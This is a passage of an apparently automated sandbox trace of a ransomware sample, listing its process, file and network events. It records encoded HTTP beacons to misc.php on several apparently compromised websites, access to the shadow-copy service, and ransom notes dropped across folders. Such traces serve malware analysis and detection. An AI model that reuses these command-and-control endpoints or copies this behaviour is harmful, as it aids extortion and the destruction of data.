- http_request: GET /raw HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: myexternalip.com~~~~
- process:
- timestamp: 44386
- mode: opened
- sequenceNumber: 435
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3012
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 44392
- repeat: 40
- sequenceNumber: 436
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x7760d98d
- process:
- timestamp: 44641
- mode: opened
- sequenceNumber: 437
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3012
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44646
- mode: opened
- sequenceNumber: 438
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2436
- imagepath: C:\Windows\System32\VSSVC.exe
- md5sum: b60ba0bc31b0cb414593e169f6f21cc2
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- network:
- timestamp: 44652
- mode: dns_query
- sequenceNumber: 439
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: irseek.com
- network:
- timestamp: 44656
- mode: dns_query_answer
- sequenceNumber: 440
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: irseek.com
- answer_number: 1
- ipaddress: 199.16.199.3
- network:
- timestamp: 44662
- mode: http_request
- sequenceNumber: 441
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.3
- http_request: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC09AE11171D2F672F40C560F36F251C4015E5604621CA6367B230F384C0D01624734323BC0C8A112F345735164448A812 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: irseek.com~~Connection: Keep-Alive~~~~
- network:
- timestamp: 44673
- mode: dns_query
- sequenceNumber: 442
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: djepola.com
- network:
- timestamp: 44676
- mode: dns_query_answer
- sequenceNumber: 443
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: djepola.com
- answer_number: 1
- ipaddress: 199.16.199.4
- network:
- timestamp: 44682
- mode: http_request
- sequenceNumber: 444
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.4
- http_request: GET /misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECCCDF4ACE08BDF5C7289F82EA3EB2B2634532A4222EE1D3499322BCAEB7C18FDFE52473350D84D471C408DB88DA2A6314 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: djepola.com~~Connection: Keep-Alive~~~~
- Ransom:
- timestamp: 44692
- sequenceNumber: 445
- pattern: MC
- value: C:\34aSjIoCE1\_GKbRFl.png
- md5sum: 247fc27abde7c110498a6b91c59362f1
- network:
- timestamp: 44726
- mode: dns_query
- sequenceNumber: 446
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: aprenderabailarsevillanas.com
- network:
- timestamp: 44730
- mode: dns_query_answer
- sequenceNumber: 447
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: aprenderabailarsevillanas.com
- answer_number: 1
- ipaddress: 199.16.199.5
- file:
- timestamp: 44734
- mode: created
- sequenceNumber: 448
- value: C:\34aSjIoCE1\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520987
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 44738
- mode: close
- sequenceNumber: 449
- value: C:\34aSjIoCE1\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520987
- ntstatus: 0x0
- CreateOptions: 0x0
- process:
- timestamp: 44743
- mode: opened
- sequenceNumber: 450
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2436
- imagepath: C:\Windows\System32\VSSVC.exe
- md5sum: b60ba0bc31b0cb414593e169f6f21cc2
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- network:
- timestamp: 44751
- mode: http_request
- sequenceNumber: 451
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.5
- http_request: GET /wp-content/uploads/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC581871DC2741952E277C0C5C394EA73D62FFDF06CAA95F626F02DD304DE50A8B24A5036A0F943613122485EC8199077B32C438EEC4196B005AED3B2E21F64BA5 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
- file:
- timestamp: 44762
- mode: created
- sequenceNumber: 452
- value: C:\34aSjIoCE1\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520988
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 44765
- mode: close
- sequenceNumber: 453
- value: C:\34aSjIoCE1\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520988
- ntstatus: 0x0
- CreateOptions: 0x0
- network:
- timestamp: 44771
- mode: dns_query
- sequenceNumber: 454
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: apotheke-stiepel.com
- network:
- timestamp: 44775
- mode: dns_query_answer
- sequenceNumber: 455
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: apotheke-stiepel.com
- answer_number: 1
- ipaddress: 199.16.199.6
- network:
- timestamp: 44780
- mode: http_request
- sequenceNumber: 456
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.6
- http_request: GET /tmp/misc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DECED21659CCF7FD986FA06F839218E7B26671AEA59CDB3DD9E39D2FBB34FC011E1FE479B2804682BF57FEE5D1570CA74FAFCF9F145EF08CF920BFFF611B7A33C72 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: apotheke-stiepel.com~~Connection: Keep-Alive~~~~
- network:
- timestamp: 44792
- mode: dns_query
- sequenceNumber: 457
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: woodenden.com
- network:
- timestamp: 44795
- mode: dns_query_answer
- sequenceNumber: 458
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: woodenden.com
- answer_number: 1
- ipaddress: 199.16.199.7
- network:
- timestamp: 44812
- mode: http_request
- sequenceNumber: 459
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.7
- http_request: GET /sysmisc.php?6D7D9F37631FC985823AE3D6A11B76975E1E6FD99B33B6A4E6449FC4ECEFB6389A70B544F14CF9CE8A41530B7494F84E81EA5965CA5805B89C7B5FE49AE87475207AE85070E1FD0627558DFC66524B2E239AD451633393B4E9EE499FC9BF4EB5126B7B70F1511843BBE94A46033DF406CEBB4805C9BB8BB0B2CBE8ED6AAC1232912CAB09525A00F545F1C01DE2D717E08C5205A093837CAFC49F90EC2C1F31664F167C190D2FA58A28E08777AE5FC037398C8B58D38598B0F7FB6179B6D0786DB48131F4BD5E8397B678BBFAA9F2798A20B75270C7A404AB3F1C3923107D9E8736CC0511780137F0821CACEDB81040DD28C799FF5A6D218AA726AF946F02D1E23B9FCAE6A23482B271395A535DAFADCE74FDE55C20A24E3348D0A84984871DEC8C1F04548850EF19C3EB9D643E09CC58931D23D4D7043ED1E0E5F59FA4F086A6869ABC83F805F0257360B1F8886541C7 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
- process:
- timestamp: 44823
- mode: opened
- sequenceNumber: 460
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2436
- imagepath: C:\Windows\System32\VSSVC.exe
- md5sum: b60ba0bc31b0cb414593e169f6f21cc2
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- Ransom:
- timestamp: 44845
- sequenceNumber: 461
- pattern: MC
- value: C:\669pqJmraSIS2\-GALpUUacZ.xls
- md5sum: 623549e1a17f1ae27c54ad0fb57df98b
- process:
- timestamp: 44905
- mode: opened
- sequenceNumber: 462
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2436
- imagepath: C:\Windows\System32\VSSVC.exe
- md5sum: b60ba0bc31b0cb414593e169f6f21cc2
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- Ransom:
- timestamp: 45070
- sequenceNumber: 463
- pattern: MC
- value: C:\669pqJmraSIS2\LmajhJG.jpg
- md5sum: 37b54be2fd7e763fe9260e32165ba9a2
- Ransom:
- timestamp: 45264
- sequenceNumber: 464
- pattern: MC
- value: C:\669pqJmraSIS2\MIQnUKwcYN.doc
- md5sum: 4dc2dc0242822f04f137b1e89c749b51
- apicall:
- timestamp: 45318
- repeat: 50
- sequenceNumber: 465
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- Ransom:
- timestamp: 45345
- sequenceNumber: 466
- pattern: MC
- value: C:\669pqJmraSIS2\sCIcnQmWp.ppt
- md5sum: a640fb1c98feba21e377df234ca31030
- file:
- timestamp: 45353
- mode: created
- sequenceNumber: 467
- value: C:\669pqJmraSIS2\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520989
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45358
- mode: close
- sequenceNumber: 468
- value: C:\669pqJmraSIS2\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520989
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45449
- mode: created
- sequenceNumber: 469
- value: C:\669pqJmraSIS2\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520990
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45453
- mode: close
- sequenceNumber: 470
- value: C:\669pqJmraSIS2\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520990
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45458
- mode: find
- sequenceNumber: 471
- value: C:\Boot\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45461
- mode: find
- sequenceNumber: 472
- value: C:\Boot\cs-CZ\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45464
- mode: created
- sequenceNumber: 473
- value: C:\Boot\cs-CZ\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520991
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45468
- mode: close
- sequenceNumber: 474
- value: C:\Boot\cs-CZ\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520991
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45494
- mode: created
- sequenceNumber: 475
- value: C:\Boot\cs-CZ\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520992
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45500
- mode: close
- sequenceNumber: 476
- value: C:\Boot\cs-CZ\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520992
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45551
- mode: find
- sequenceNumber: 477
- value: C:\Boot\da-DK\*
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45587
- mode: created
- sequenceNumber: 478
- value: C:\Boot\da-DK\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520993
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45591
- mode: close
- sequenceNumber: 479
- value: C:\Boot\da-DK\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520993
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45599
- mode: created
- sequenceNumber: 480
- value: C:\Boot\da-DK\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520994
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45603
- mode: close
- sequenceNumber: 481
- value: C:\Boot\da-DK\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520994
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45608
- mode: created
- sequenceNumber: 482
- value: C:\Boot\de-DE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520995
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45612
- mode: close
- sequenceNumber: 483
- value: C:\Boot\de-DE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520995
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 45805
- repeat: 60
- sequenceNumber: 484
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 45811
- mode: created
- sequenceNumber: 485
- value: C:\Boot\de-DE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520996
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45816
- mode: close
- sequenceNumber: 486
- value: C:\Boot\de-DE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520996
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 45821
- mode: created
- sequenceNumber: 487
- value: C:\Boot\el-GR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520997
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 45826
- mode: close
- sequenceNumber: 488
- value: C:\Boot\el-GR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520997
- ntstatus: 0x0
- CreateOptions: 0x0
- process:
- timestamp: 45992
- mode: opened
- sequenceNumber: 489
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1100
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 46008
- mode: created
- sequenceNumber: 490
- value: C:\Boot\el-GR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520998
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46012
- mode: close
- sequenceNumber: 491
- value: C:\Boot\el-GR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520998
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46016
- mode: created
- sequenceNumber: 492
- value: C:\Boot\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520999
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46020
- mode: close
- sequenceNumber: 493
- value: C:\Boot\en-US\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953520999
- ntstatus: 0x0
- CreateOptions: 0x0
- uac:
- timestamp: 46066
- mode: service
- sequenceNumber: 494
- value: Volume Shadow Copy
- status: running
- process:
- timestamp: 46191
- mode: opened
- sequenceNumber: 495
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1100
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 46204
- mode: created
- sequenceNumber: 496
- value: C:\Boot\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521000
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46209
- mode: close
- sequenceNumber: 497
- value: C:\Boot\en-US\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521000
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46213
- mode: created
- sequenceNumber: 498
- value: C:\Boot\es-ES\how_recover+deg.txt
- processinfo:
- pid: 1648
